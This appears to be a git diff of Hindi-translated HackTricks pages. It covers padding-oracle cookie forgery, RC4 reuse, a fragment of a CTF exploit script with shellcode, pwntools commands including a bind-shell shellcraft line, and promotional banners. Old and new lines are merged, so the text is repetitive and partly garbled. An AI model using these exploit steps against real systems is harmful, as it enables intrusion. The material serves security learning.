यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गड़बड़ हो सकती है**। लॉग इन करने पर प्रेषित कुकी **हर बार अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा** यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गलती** हो सकती है। वापस भेजी गई कुकी हर बार जब आप लॉग इन करते हैं, **अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा**
अब, यदि आप **कुकी** को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\ अब, यदि आप कुकी को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\
लेकिन यदि आप पैडिंग को बीएफ करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य है। यह स्थिति पैडबस्टर के लिए अत्यधिक संभावित रूप से विकल्पयोग्य है। लेकिन यदि आप पैडिंग को ब्रूट-फोर्स करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य होती है। यह परिदृश्य पैडबस्टर के लिए अत्यधिक संभावित है।
# संदर्भ ## संदर्भ
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
<details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **PDF में HackTricks डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स और हैकट्रिक्स क्लाउड गिटहब रेपो में पीआर जमा करके।
</details>

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %}
यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं। यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं।

View file

@ -1,29 +1,35 @@
# ईमेल सुरक्षा की कमियाँ # ईमेल सुरक्षा दोष
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
</details> </details>
{% endhint %}
## ##
## ##
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
# Level00 # Level00
@ -70,16 +71,17 @@ buf += "\x65\xd9\x0f\x01"
r.send(buf) r.send(buf)
r.interactive() r.interactive()
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
``` ```
pip3 install pwntools pip3 install pwntools
``` ```
@ -26,17 +27,17 @@ pwn asm -i <filepath>
* आउटपुट प्रकार (रॉ,हेक्स,स्ट्रिंग,ईएलएफ) * आउटपुट प्रकार (रॉ,हेक्स,स्ट्रिंग,ईएलएफ)
* आउटपुट फ़ाइल संदर्भ (16,32,64,लिनक्स,विंडोज...) * आउटपुट फ़ाइल संदर्भ (16,32,64,लिनक्स,विंडोज...)
* बाइट्स से बचें (न्यू लाइन्स, नल, एक सूची) * बाइट्स से बचें (न्यू लाइन्स, नल, एक सूची)
* जीडीबी चलाकर आउटपुट का डीबग शेलकोड का चयन करें * gdb चलाकर आउटपुट का डीबग शेलकोड चुनें
# **पॉन चेकसेक** # **Pwn checksec**
चेकसेक स्क्रिप्ट Checksec स्क्रिप्ट
``` ```
pwn checksec <executable> pwn checksec <executable>
``` ```
# हैक constgrep # Pwn constgrep
# हैक cyclic # Pwn cyclic
एक पैटर्न प्राप्त करें एक पैटर्न प्राप्त करें
``` ```
@ -58,11 +59,11 @@ pwn debug --exec /bin/bash
pwn debug --pid 1234 pwn debug --pid 1234
pwn debug --process bash pwn debug --process bash
``` ```
**चुन सकते हैं:** **चयन कर सकते हैं:**
* कार्यकारी, नाम या पिडी संदर्भ (16,32,64,लिनक्स,विंडोज...) * कार्यकारी, नाम या पीआईडी संदर्भ (16,32,64,लिनक्स,विंडोज...)
* निष्पादन के लिए gdbscript * निष्पादन करने के लिए gdbscript
* सिसरूटपथ * सिसरूटप
# Pwn disablenx # Pwn disablenx
@ -72,11 +73,11 @@ pwn disablenx <filepath>
``` ```
# Pwn disasm # Pwn disasm
हेक्स ओपकोड को डिसैसेम्बल करें हेक्स ओपकोड को disasemble करें
``` ```
pwn disasm ffe4 pwn disasm ffe4
``` ```
**चुन सकते हैं:** **चयन कर सकते हैं:**
* संदर्भ (16,32,64,लिनक्स,विंडोज...) * संदर्भ (16,32,64,लिनक्स,विंडोज...)
* मूल पता * मूल पता
@ -88,7 +89,7 @@ pwn disasm ffe4
``` ```
pwn elfdiff <file1> <file2> pwn elfdiff <file1> <file2>
``` ```
# हेक्स पान # हेक्स पान
हेक्साडेसिमल प्रतिनिधित्व प्राप्त करें हेक्साडेसिमल प्रतिनिधित्व प्राप्त करें
```bash ```bash
@ -112,7 +113,7 @@ pwn phd <file>
# Pwn shellcraft # Pwn shellcraft
लकोड प्राप्त करें लकोड प्राप्त करें
``` ```
pwn shellcraft -l #List shellcodes pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name pwn shellcraft -l amd #Shellcode with amd in the name
@ -122,18 +123,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
``` ```
**चयन करें:** **चयन करें:**
* शैलकोड और शैलकोड के लिए तार्किक * शेलकोड और शेलकोड के लिए तार्किक
* आउट फ़ाइल * आउट फ़ाइल
* आउटपुट प्रारूप * आउटपुट प्रारूप
* डीबग (शैलकोड को dbg से जोड़ें) * डीबग (शेलकोड पर dbg जोड़ें)
* पहले (कोड से पहले डीबग ट्रैप) * पहले (कोड से पहले डीबग ट्रैप)
* बाद * बाद
* ओपकोड का उपयोग न करें (डिफ़ॉल्ट: नल और नई लाइन) * ओपकोड का उपयोग न करें (डिफ़ॉल्ट: नल और नई लाइन)
* शलकोड चलाएं * शलकोड चलाएं
* रंग/कोई रंग नहीं * रंग/कोई रंग नहीं
* सिसकॉल्स की सूची * सिसकॉल्स की सूची
* संभावित शलकोड की सूची * संभावित शलकोड की सूची
* ELF को एक साझा पुस्तकालय के रूप में उत्पन्न करें * ELF को साझा पुस्तकालय के रूप में उत्पन्न करें
# Pwn टेम्पलेट # Pwn टेम्पलेट
@ -141,7 +142,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
``` ```
pwn template pwn template
``` ```
**चुन सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत **का चयन कर सकते हैं:** होस्ट, पोर्ट, उपयोगकर्ता, पासवर्ड, पथ और शांत
# Pwn अनहेक्स # Pwn अनहेक्स
@ -155,16 +156,17 @@ pwntools को अपडेट करने के लिए
``` ```
pwn update pwn update
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,24 +1,25 @@
# Windows Exploiting (Basic Guide - OSCP lvl) # Windows Exploiting (मूल गाइड - OSCP स्तर)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को पीआर जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** PRs के माध्यम से [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
</details> </details>
{% endhint %}
## **SLMail सेवा स्थापित करना शुरू करें** ## **SLMail सेवा को स्थापित करना शुरू करें**
## SLMail सेवा पुनः आरंभ करें ## SLMail सेवा को पुनः आरंभ करें
